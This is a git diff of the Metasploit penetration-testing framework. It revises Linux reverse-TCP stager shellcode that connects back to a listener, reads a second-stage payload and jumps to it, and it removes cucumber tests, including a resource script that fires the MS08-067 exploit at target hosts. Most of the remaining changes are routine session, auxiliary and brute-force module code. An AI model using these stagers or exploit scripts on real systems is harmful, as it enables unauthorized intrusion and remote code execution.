mov x8, SYS_READ
svc 0
add x3, x3, x0
subs x4, x4, x0
bne read_loop
/* Go to shellcode */
ldr x30, [sp]
ret
failed:
mov x0, 0
mov x8, SYS_EXIT
svc 0
.balign 4
sockaddr:
.short AF_INET
.short PORT
.word IP

45
external/source/shellcode/linux/ia32/stager_sock_reverse.asm vendored
View File

@ -1,9 +1,9 @@
;;
;
;
; Name: stager_sock_reverse
; Qualities: Can Have Nulls
; Version: $Revision: 1512 $
; License:
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
@ -33,11 +33,13 @@ BITS 32
GLOBAL _start
_start:
push 0x5 ; retry counter
pop esi
create_socket:
xor ebx, ebx
mul ebx
; int socket(int domain, int type, int protocol);
socket:
; int socket(int domain, int type, int protocol);
push ebx ; protocol = 0 = first that matches this type and domain, i.e. tcp
inc ebx ; 1 = SYS_SOCKET
push ebx ; type = 1 = SOCK_STREAM
@ -47,13 +49,15 @@ socket:
int 0x80
xchg eax, edi
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
connect:
pop ebx
set_address:
pop ebx ; set ebx back to zero
push dword 0x0100007f ; addr->sin_addr = 127.0.0.1
push 0xbfbf0002 ; addr->sin_port = 49087
; addr->sin_family = 2 = AF_INET
mov ecx, esp ; ecx = addr
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
try_connect:
push byte 0x66 ; __NR_socketcall
pop eax
push eax ; addrlen
@ -62,6 +66,22 @@ connect:
mov ecx, esp ; socketcall args
inc ebx ; 3 = SYS_CONNECT
int 0x80
test eax, eax
jns mprotect
handle_failure:
push 0xa2
pop eax
push 0x0 ; sleep_nanoseconds
push 0x5 ; sleep_seconds
mov ebx, esp
xor ecx, ecx
int 0x80 ; sys_nanosleep
test eax, eax
js failed
dec esi
jnz create_socket
jmp failed
%ifndef USE_SINGLE_STAGE
@ -74,6 +94,8 @@ mprotect:
shl ebx, 12
mov al, 0x7d ; __NR_mprotect
int 0x80
test eax, eax
js failed
; ssize_t read(int fd, void *buf, size_t count);
recv:
@ -83,6 +105,13 @@ recv:
mov dh, 0xc ; count = 0xc00
mov al, 0x3 ; __NR_read
int 0x80
test eax, eax
js failed
jmp ecx
failed:
mov eax, 0x1
mov ebx, 0x1 ; set exit status to 1
int 0x80 ; sys_exit
%endif

85
external/source/shellcode/linux/x64/stager_sock_reverse.s vendored
View File

@ -25,51 +25,58 @@
.text
.globl _start
_start:
xor %rdi,%rdi
pushq $0x9
xor %rdi, %rdi
push $0x9
pop %rax
cltd
mov $0x10,%dh
mov %rdx,%rsi
xor %r9,%r9
pushq $0x22
cdq
mov $0x10, %dh
mov %rdx, %rsi
xor %r9, %r9
push $0x22
pop %r10
mov $0x7,%dl
syscall
test %rax, %rax
js failed
# mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
push %rsi
push %rax
pushq $0x29
pop %rax
cltd
pushq $0x2
pop %rdi
pushq $0x1
pop %rsi
syscall
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test %rax, %rax
js failed
xchg %rax,%rdi
movabs $0x100007fb3150002,%rcx
push %rcx
mov %rsp,%rsi
pushq $0x10
pop %rdx
pushq $0x2a
pop %rax
syscall
# connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
mov $0x7, %dl
syscall # mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
test %rax, %rax
js failed
push %rsi
push %rax
push $0x29
pop %rax
cdq
push $0x2
pop %rdi
push $0x1
pop %rsi
syscall # socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
test %rax, %rax
js failed
xchg %rax, %rdi
movabs $0x100007fb3150002, %rcx
push %rcx
mov %rsp, %rsi
push $0x10
pop %rdx
push $0x2a
pop %rax
syscall # connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
test %rax, %rax
js failed
pop %rcx
pop %rsi
pop %rdx
syscall # read(3, "", 4096)
jmpq *%rsi
test %rax, %rax
js failed
jmpq *%rsi # to stage
failed:
pushq $0x3c
push $0x3c
pop %rax
pushq $0x1
push $0x1
pop %rdi
syscall
# exit(1)
syscall # exit(1)

111
features/commands/help.feature
View File

@ -1,111 +0,0 @@
Feature: Help command
Background:
Given I run `msfconsole --defer-module-loads -q -x help -x exit`
Scenario: The 'help' command's output
Then the output should contain:
"""
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
get Gets the value of a context-specific variable
getg Gets the value of a global variable
grep Grep the output of another command
help Help menu
history Show command history
irb Drop into irb scripting mode
load Load a framework plugin
quit Exit the console
route Route traffic through a session
save Saves the active datastores
sessions Dump session listings and display information about sessions
set Sets a context-specific variable to a value
setg Sets a global variable to a value
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more context-specific variables
unsetg Unsets one or more global variables
version Show the framework and console library version numbers
Module Commands
===============
Command Description
------- -----------
advanced Displays advanced options for one or more modules
back Move back from the current context
edit Edit the current module with the preferred editor
info Displays information about one or more modules
loadpath Searches for and loads modules from a path
options Displays global options or for one or more modules
popm Pops the latest module off the stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
reload_all Reloads all modules from all defined module paths
search Searches module names and descriptions
show Displays modules of a given type, or all modules
use Selects a module by name
Job Commands
============
Command Description
------- -----------
handler Start a payload handler as job
jobs Displays and manages jobs
kill Kill a job
rename_job Rename a job
Resource Script Commands
========================
Command Description
------- -----------
makerc Save commands entered since start to a file
resource Run the commands stored in a file
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Credentials Backend Commands
============================
Command Description
------- -----------
creds List all credentials in the database
"""

48
features/modules/exploit/smb/ms08_067_netapi.feature
View File

@ -1,48 +0,0 @@
@targets @db
Feature: MS08-067 netapi
Background:
Given a directory named "home"
And I cd to "home"
And a mocked home directory
Scenario: The MS08-067 should get a session with bind_tcp
Given I ready the windows targets
Given a file named "ms08-067-bind.rc" with:
"""
<ruby>
self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
payload_name = 'windows/meterpreter/bind_tcp'
exploited_hosts = []
failed_hosts = []
hosts.each do |host|
print_status("Trying MS08-067 against #{host['ipAddress']}")
mod = framework.exploits.create('windows/smb/ms08_067_netapi')
mod.datastore['PAYLOAD'] = payload_name
mod.datastore['RHOST'] = host['ipAddress']
m = mod.exploit_simple(
'LocalInput' => nil,
'LocalOutput' => nil,
'Payload' => payload_name,
'RunAsJob' => false
)
sleep(1)
if m
exploited_hosts << host['ipAddress']
else
failed_hosts << host['ipAddress']
end
end
print_status("Exploited hosts: #{exploited_hosts.inspect}")
print_status("Failed hosts: #{failed_hosts.inspect}")
self.run_single('sessions -K')
</ruby>
"""
When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
Then the 'Mdm::Host' table contains the expected targets

153
features/msfconsole/database_yml.feature
View File

@ -1,153 +0,0 @@
@boot
Feature: `msfconsole` `database.yml`
In order to connect to the database in `msfconsole`
As a user calling `msfconsole` from a terminal
I want to be able to set the path of the `database.yml` in one of 4 locations (in order of precedence):
1. An explicit argument to the `-y` flag to `msfconsole`
2. The MSF_DATABASE_CONFIG environment variable
3. The user's `~/.msf4/database.yml`
4. `config/database.yml` in the metasploit-framework checkout location.
Scenario: With all 4 locations, --yaml wins
Given a file named "command_line.yml" with:
"""
test:
adapter: postgresql
database: command_line_metasploit_framework_test
username: command_line_metasploit_framework_test
"""
And a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit --yaml command_line.yml`
Then the output should contain "command_line_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG wins
Given a file named "msf_database_config.yml" with:
"""
test:
adapter: postgresql
database: environment_metasploit_framework_test
username: environment_metasploit_framework_test
"""
And I set the environment variables to:
| variable | value |
| MSF_DATABASE_CONFIG | msf_database_config.yml |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "environment_metasploit_framework_test"
Scenario: Without --yaml or MSF_DATABASE_CONFIG, ~/.msf4/database.yml wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And a directory named ".msf4"
And I cd to ".msf4"
And a file named "database.yml" with:
"""
test:
adapter: postgresql
database: user_metasploit_framework_test
username: user_metasploit_framework_test
"""
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command exit`
Then the output should contain "user_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG or ~/.msf4/database.yml, project "database.yml" wins
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" exists with:
"""
test:
adapter: postgresql
database: project_metasploit_framework_test
username: project_metasploit_framework_test
"""
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should contain "project_metasploit_framework_test"
Scenario: Without --yaml, MSF_DATABASE_CONFIG, ~/.msf4/database.yml, or project "database.yml", no database connection
Given I unset the environment variables:
| variable |
| MSF_DATABASE_CONFIG |
And a directory named "home"
And I cd to "home"
And a mocked home directory
And I cd to "../.."
And the project "database.yml" does not exist
When I run `msfconsole -q --defer-module-loads --environment test --execute-command db_status --execute-command exit`
Then the output should not contain "command_line_metasploit_framework_test"
And the output should not contain "environment_metasploit_framework_test"
And the output should not contain "user_metasploit_framework_test"
And the output should not contain "project_metasploit_framework_test"
And the output should contain "[*] postgresql selected, no connection"
Scenario: Starting `msfconsole` with a valid database.yml
When I run `msfconsole -q --defer-module-loads --execute-command db_status --execute-command exit`
Then the output should contain "[*] postgresql connected to metasploit_framework_test"

20
features/step_definitions/environment_variables.rb
View File

@ -1,20 +0,0 @@
Given /^I unset the environment variables:$/ do |table|
table.hashes.each do |row|
variable = row['variable'].to_s.upcase
# @todo add extension to Announcer
announcer.instance_eval do
if @options[:env]
print "$ unset #{variable}"
end
end
current_value = ENV.delete(variable)
# if original_env already has the key, then the true original was already recorded from a previous unset or set,
# so don't record the current value as it will cause ENV not to be restored after the Scenario.
unless original_env.key? variable
original_env[variable] = current_value
end
end
end

14
features/step_definitions/project.rb
View File

@ -1,14 +0,0 @@
require 'metasploit/framework/database/cucumber'
Given /^the project "database.yml" does not exist$/ do
Metasploit::Framework::Database::Cucumber.backup_project_configurations
end
Given /^the project "database.yml" exists with:$/ do |file_content|
Metasploit::Framework::Database::Cucumber.backup_project_configurations
File.open(Metasploit::Framework::Database::Cucumber.project_configurations_path, 'wb') { |file| file.write(file_content) }
end
After do
Metasploit::Framework::Database::Cucumber.restore_project_configurations
end

26
features/support/bin/stty
View File

@ -1,26 +0,0 @@
#!/usr/bin/env ruby
case ARGV[0]
when 'size'
puts "30 134"
when '-a'
puts <<EOS
speed 38400 baud; 30 rows; 134 columns;
lflags: icanon isig iexten echo echoe echok echoke -echonl echoctl
-echoprt -altwerase -noflsh -tostop -flusho pendin -nokerninfo
-extproc
iflags: -istrip icrnl -inlcr -igncr ixon -ixoff ixany imaxbel iutf8
-ignbrk brkint -inpck -ignpar -parmrk
oflags: opost onlcr -oxtabs -onocr -onlret
cflags: cread cs8 -parenb -parodd hupcl -clocal -cstopb -crtscts -dsrflow
-dtrflow -mdmbuf
cchars: discard = ^O; dsusp = ^Y; eof = ^D; eol = <undef>;
eol2 = <undef>; erase = ^?; intr = ^C; kill = ^U; lnext = ^V;
min = 1; quit = ^\; reprint = ^R; start = ^Q; status = ^T;
stop = ^S; susp = ^Z; time = 0; werase = ^W;
EOS
when '-g'
puts "gfmt1:cflag=4b00:iflag=6b02:lflag=200005cf:oflag=3:discard=f:dsusp=19:eof=4:eol=ff:eol2=ff:erase=7f:intr=3:kill=15:lnext=16:min=1:quit=1c:reprint=12:start=11:status=14:stop=13:susp=1a:time=0:werase=17:ispeed=38400:ospeed=38400"
end
exit 0

34
features/support/env.rb
View File

@ -1,34 +0,0 @@
# @note `require 'simplecov'` is not used here because all features currently use external `msfconsole` process, so only
# that child process needs to load 'simplecov'.
# IMPORTANT: This file is generated by cucumber-rails - edit at your own peril.
# It is recommended to regenerate this file in the future when you upgrade to a
# newer version of cucumber-rails. Consider adding your own code to a new file
# instead of editing this one. Cucumber will automatically load all features/**/*.rb
# files.
require 'cucumber/rails'
require 'aruba/cucumber'
# Capybara defaults to XPath selectors rather than Webrat's default of CSS3. In
# order to ease the transition to Capybara we set the default here. If you'd
# prefer to use XPath just remove this line and adjust any selectors in your
# steps to use the XPath syntax.
Capybara.default_selector = :css
# By default, any exception happening in your Rails application will bubble up
# to Cucumber so that your scenario will fail. This is a different from how
# your application behaves in the production environment, where an error page will
# be rendered instead.
#
# Sometimes we want to override this default behaviour and allow Rails to rescue
# exceptions and display an error page (just like when the app is running in production).
# Typical scenarios where you want to do this is when you test your error pages.
# There are two ways to allow Rails to rescue exceptions:
#
# 1) Tag your scenario (or feature) with @allow-rescue
#
# 2) Set the value below to true. Beware that doing this globally is not
# recommended as it will mask a lot of errors for you!
#
ActionController::Base.allow_rescue = false

39
features/support/hooks.rb
View File

@ -1,39 +0,0 @@
Before do
set_env('MSF_DATBASE_CONFIG', Rails.configuration.paths['config/database'].existent.first)
set_env('RAILS_ENV', 'test')
@aruba_timeout_seconds = 8.minutes
end
Before('@db') do |scenario|
dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
ActiveRecord::Base.establish_connection(dbconfig["test"])
end
# don't setup child processes to load simplecov_setup.rb if simplecov isn't installed
# unless Bundler.settings.without.include?(:coverage)
# Before do |scenario|
# command_name = case scenario
# when Cucumber::Ast::Scenario, Cucumber::Ast::ScenarioOutline
# "#{scenario.feature.title} #{scenario.name}"
# when Cucumber::Ast::OutlineTable::ExampleRow
# scenario_outline = scenario.scenario_outline
#
# "#{scenario_outline.feature.title} #{scenario_outline.name} #{scenario.name}"
# else
# raise TypeError, "Don't know how to extract command name from #{scenario.class}"
# end
#
# # Used in simplecov_setup so that each scenario has a different name and their coverage results are merged instead
# # of overwriting each other as 'Cucumber Features'
# set_env('SIMPLECOV_COMMAND_NAME', command_name)
#
# simplecov_setup_pathname = Pathname.new(__FILE__).expand_path.parent.join('simplecov_setup')
# # set environment variable so child processes will merge their coverage data with parent process's coverage data.
# set_env('RUBYOPT', "#{ENV['RUBYOPT']} -r#{simplecov_setup_pathname}")
# end
#
# Before('@db') do |scenario|
# dbconfig = YAML::load(File.open(Metasploit::Framework::Database.configurations_pathname))
# ActiveRecord::Base.establish_connection(dbconfig["test"])
# end
# end

16
features/support/simplecov_setup.rb
View File

@ -1,16 +0,0 @@
# @note this file is loaded in env.rb to setup simplecov using RUBYOPTs for child processes
simplecov_command_name = ENV['SIMPLECOV_COMMAND_NAME']
# will not be set if hook does not run because `bundle install --without coverage`
if simplecov_command_name
require 'simplecov'
require 'pathname'
root = Pathname(__FILE__).expand_path.parent.parent.parent
SimpleCov.command_name(simplecov_command_name)
SimpleCov.root(root)
load root.join('.simplecov')
end

11
features/support/stty.rb
View File

@ -1,11 +0,0 @@
require 'pathname'
support = Pathname.new(__FILE__).realpath.parent
paths = [
# adds support/bin at the front of the path so that the support/bin/stty script will be used to fake system stty
# output.
support.join('bin').to_path,
ENV['PATH']
]
ENV['PATH'] = paths.join(File::PATH_SEPARATOR)

7
features/support/targets.yml.example
View File

@ -1,7 +0,0 @@
windows:
-
hostname: wxpsp0
ip: 127.0.0.100
-
hostname: wxpsp2
ip: 127.0.0.101

36
lib/metasploit/framework/database/cucumber.rb
View File

@ -1,36 +0,0 @@
require 'metasploit/framework/database'
module Metasploit::Framework::Database::Cucumber
def self.project_configurations_path
Rails.root.join('config', 'database.yml').to_path
end
def self.backup_project_configurations
if File.exist?(project_configurations_path)
# assume that the backup file is from a previously aborted run and it contains the real database.yml data, so
# just delete the fake database.yml and the After hook will restore the real database.yml from the backup location
if File.exist?(backup_project_configurations_path)
File.delete(project_configurations_path)
else
# project contains the real database.yml and there was no previous, aborted run.
File.rename(project_configurations_path, backup_project_configurations_path)
end
end
end
def self.backup_project_configurations_path
"#{project_configurations_path}.cucumber.bak"
end
def self.restore_project_configurations
if File.exist?(backup_project_configurations_path)
if File.exist?(project_configurations_path)
# Remove fake, leftover database.yml
File.delete(project_configurations_path)
end
File.rename(backup_project_configurations_path, project_configurations_path)
end
end
end

2
lib/metasploit/framework/version.rb
View File

@ -30,7 +30,7 @@ module Metasploit
end
end
VERSION = "4.15.0"
VERSION = "4.16.0"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash

16
lib/msf/base/serializer/readable_text.rb
View File

@ -541,6 +541,7 @@ class ReadableText
columns << 'Id'
columns << 'Type'
columns << 'Checkin?' if show_extended
columns << 'Enc?' if show_extended
columns << 'Local URI' if show_extended
columns << 'Information'
columns << 'Connection'
@ -575,6 +576,12 @@ class ReadableText
row << '?'
end
if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
row << "Y"
else
row << 'N'
end
if session.exploit_datastore.has_key?('LURI') && !session.exploit_datastore['LURI'].empty?
row << " (#{session.exploit_datastore['LURI']})"
else
@ -616,12 +623,16 @@ class ReadableText
sess_uuid = session.payload_uuid.to_s
sess_puid = session.payload_uuid.respond_to?(:puid_hex) ? session.payload_uuid.puid_hex : nil
sess_luri = session.exploit_datastore['LURI'] || ""
sess_enc = false
if session.respond_to?(:tlv_enc_key) && session.tlv_enc_key && session.tlv_enc_key[:key]
sess_enc = true
end
sess_checkin = "<none>"
sess_registration = "No"
if session.respond_to? :platform
sess_type << (" " + session.platform)
if session.respond_to?(:platform)
sess_type << " " + session.platform
end
if session.respond_to?(:last_checkin) && session.last_checkin
@ -640,6 +651,7 @@ class ReadableText
out << " Info: #{sess_info}\n"
out << " Tunnel: #{sess_tunnel}\n"
out << " Via: #{sess_via}\n"
out << " Encrypted: #{sess_enc}\n"
out << " UUID: #{sess_uuid}\n"
out << " CheckIn: #{sess_checkin}\n"
out << " Registered: #{sess_registration}\n"

2
lib/msf/base/sessions/command_shell_options.rb
View File

@ -4,7 +4,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
##

7
lib/msf/base/sessions/meterpreter_options.rb
View File

@ -43,6 +43,8 @@ module MeterpreterOptions
valid = true
session.tlv_enc_key = session.core.negotiate_tlv_encryption
if datastore['AutoVerifySession']
if not session.is_valid_session?(datastore['AutoVerifySessionTimeout'].to_i)
print_error("Meterpreter session #{session.sid} is not valid and will be closed")
@ -52,14 +54,13 @@ module MeterpreterOptions
if valid
# always make sure that the new session has a new guid if it's not already known
guid = session.core.get_session_guid
guid = session.session_guid
if guid == '00000000-0000-0000-0000-000000000000'
guid = SecureRandom.uuid
session.core.set_session_guid(guid)
session.guid = guid
session.session_guid = guid
# TODO: New statgeless session, do some account in the DB so we can track it later.
else
session.guid = guid
# TODO: This session was either staged or previously known, and so we shold do some accounting here!
end

29
lib/msf/base/sessions/meterpreter_x64_osx.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x64_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X64
end
end
end
end

4
lib/msf/base/sessions/meterpreter_x64_win.rb
View File

@ -21,6 +21,10 @@ class Meterpreter_x64_Win < Msf::Sessions::Meterpreter
def lookup_error(code)
Msf::WindowsError.description(code)
end
def supports_ssl?
false
end
end
end

29
lib/msf/base/sessions/meterpreter_x86_osx.rb Normal file
View File

@ -0,0 +1,29 @@
# -*- coding: binary -*-
require 'msf/base/sessions/meterpreter'
module Msf
module Sessions
###
#
# This class creates a platform-specific meterpreter session type
#
###
class Meterpreter_x86_OSX < Msf::Sessions::Meterpreter
def supports_ssl?
false
end
def supports_zlib?
false
end
def initialize(rstream, opts={})
super
self.base_platform = 'osx'
self.base_arch = ARCH_X86
end
end
end
end

4
lib/msf/base/sessions/meterpreter_x86_win.rb
View File

@ -21,6 +21,10 @@ class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
def lookup_error(code)
Msf::WindowsError.description(code)
end
def supports_ssl?
false
end
end
end

8
lib/msf/base/simple/auxiliary.rb
View File

@ -138,6 +138,14 @@ protected
mod.setup
mod.framework.events.on_module_run(mod)
mod.run
rescue Msf::Auxiliary::Complete
mod.cleanup
return
rescue Msf::Auxiliary::Failed => e
mod.error = e
mod.print_error("Auxiliary aborted due to failure: #{e.message}")
mod.cleanup
return
rescue ::Timeout::Error => e
mod.error = e
mod.print_error("Auxiliary triggered a timeout exception")

8
lib/msf/base/simple/post.rb
View File

@ -108,6 +108,14 @@ protected
mod.cleanup
return
end
rescue Msf::Post::Complete
mod.cleanup
return
rescue Msf::Post::Failed => e
mod.error = e
mod.print_error("Post aborted due to failure: #{e.message}")
mod.cleanup
return
rescue ::Timeout::Error => e
mod.error = e
mod.print_error("Post triggered a timeout exception")

11
lib/msf/core/auxiliary.rb
View File

@ -15,6 +15,12 @@ class Auxiliary < Msf::Module
require 'msf/core/auxiliary/mixins'
class Complete < RuntimeError
end
class Failed < RuntimeError
end
include HasActions
#
@ -152,6 +158,11 @@ class Auxiliary < Msf::Module
}
end
# Override Msf::Module#fail_with for Msf::Simple::Auxiliary::job_run_proc
def fail_with(reason, msg = nil)
raise Msf::Auxiliary::Failed, "#{reason.to_s}: #{msg}"
end
attr_accessor :queue
protected

72
lib/msf/core/auxiliary/auth_brute.rb
View File

@ -362,7 +362,6 @@ module Auxiliary::AuthBrute
# Note, these special username/passwords should get deprecated
# some day. Note2: Don't use with SMB and FTP at the same time!
def translate_proto_datastores
switched = false
['SMBUser','FTPUSER'].each do |u|
if datastore[u] and !datastore[u].empty?
datastore['USERNAME'] = datastore[u]
@ -547,6 +546,20 @@ module Auxiliary::AuthBrute
end
end
def vprint_status(msg='')
print_brute :level => :vstatus
end
def vprint_error(msg='')
print_brute :level => :verror
end
alias_method :vprint_bad, :vprint_error
def vprint_good(msg='')
print_brute :level => :vgood
end
# Provides a consistant way to display messages about AuthBrute-mixed modules.
# Acceptable opts are fairly self-explanatory, but :level can be tricky.
#
@ -568,10 +581,10 @@ module Auxiliary::AuthBrute
end
host_ip = opts[:ip] || opts[:rhost] || opts[:host] || (rhost rescue nil) || datastore['RHOST']
host_port = opts[:port] || opts[:rport] || (rport rescue nil) || datastore['RPORT']
msg = opts[:msg] || opts[:message] || opts[:legacy_msg]
msg = opts[:msg] || opts[:message]
proto = opts[:proto] || opts[:protocol] || proto_from_fullname
complete_message = build_brute_message(host_ip,host_port,proto,msg,!!opts[:legacy_msg])
complete_message = build_brute_message(host_ip,host_port,proto,msg)
print_method = "print_#{level}"
if self.respond_to? print_method
@ -582,34 +595,24 @@ module Auxiliary::AuthBrute
end
# Depending on the non-nil elements, build up a standardized
# auth_brute message, but support the old style used by
# vprint_status and friends as well.
def build_brute_message(host_ip,host_port,proto,msg,legacy)
# auth_brute message.
def build_brute_message(host_ip,host_port,proto,msg)
ip = host_ip.to_s.strip if host_ip
port = host_port.to_s.strip if host_port
complete_message = nil
extracted_message = nil
if legacy # TODO: This is all a workaround until I get a chance to get rid of the legacy messages
old_msg = msg.to_s.strip
msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
if old_msg.match(msg_regex) and !old_msg.match(msg_regex)[6].to_s.strip.empty?
complete_message = ''
unless ip.blank? && port.blank?
complete_message << "#{ip}:#{rport}"
else
complete_message << (old_msg.match(msg_regex)[4] || proto).to_s
end
complete_message << " - "
progress = tried_over_total(ip,port)
complete_message << progress if progress
complete_message << old_msg.match(msg_regex)[6].to_s.strip
else
complete_message = msg.to_s.strip
end
old_msg = msg.to_s.strip
msg_regex = /(#{ip})(:#{port})?(\s*-?\s*)(#{proto.to_s})?(\s*-?\s*)(.*)/ni
if old_msg.match(msg_regex)
complete_message = msg.to_s.strip
else
complete_message = ''
complete_message << "#{proto.to_s.strip} - " if proto
unless ip.blank? && port.blank?
complete_message << "#{ip}:#{port}"
else
complete_message << proto || 'Bruteforce'
end
complete_message << " - "
progress = tried_over_total(ip,port)
complete_message << progress if progress
complete_message << msg.to_s.strip
@ -657,23 +660,6 @@ module Auxiliary::AuthBrute
File.split(self.fullname).last.match(/^(.*)_(login|auth|identify)/)[1].upcase rescue nil
end
# Legacy vprint
def vprint_status(msg='')
print_brute :level => :vstatus, :legacy_msg => msg
end
# Legacy vprint
def vprint_error(msg='')
print_brute :level => :verror, :legacy_msg => msg
end
alias_method :vprint_bad, :vprint_error
# Legacy vprint
def vprint_good(msg='')
print_brute :level => :vgood, :legacy_msg => msg
end
# This method deletes the dictionary files if requested
def cleanup_files
path = datastore['USERPASS_FILE']

2
lib/msf/core/auxiliary/web/analysis/differential.rb
View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
##
module Msf

2
lib/msf/core/auxiliary/web/analysis/taint.rb
View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
##
module Msf

2
lib/msf/core/auxiliary/web/analysis/timing.rb
View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
##
module Msf

2
lib/msf/core/auxiliary/web/form.rb
View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
require 'net/https'
require 'net/http'

2
lib/msf/core/auxiliary/web/fuzzable.rb
View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
require 'net/https'
require 'net/http'

2
lib/msf/core/auxiliary/web/http.rb
View File

@ -3,7 +3,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
##
require 'uri'

2
lib/msf/core/auxiliary/web/path.rb
View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
require 'net/https'
require 'net/http'

2
lib/msf/core/auxiliary/web/target.rb
View File

@ -2,7 +2,7 @@
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# https://metasploit.com/framework/
require 'net/https'
require 'net/http'

21
lib/msf/core/data_store.rb
View File

@ -14,10 +14,13 @@ class DataStore < Hash
#
def initialize()
@options = Hash.new
@aliases = Hash.new
@imported = Hash.new
@imported_by = Hash.new
end
attr_accessor :aliases
#
# Clears the imported flag for the supplied key since it's being set
# directly.
@ -133,11 +136,16 @@ class DataStore < Hash
}
end
def import_option(key, val, imported=true, imported_by=nil, option=nil)
def import_option(key, val, imported = true, imported_by = nil, option = nil)
self.store(key, val)
if option
option.aliases.each do |a|
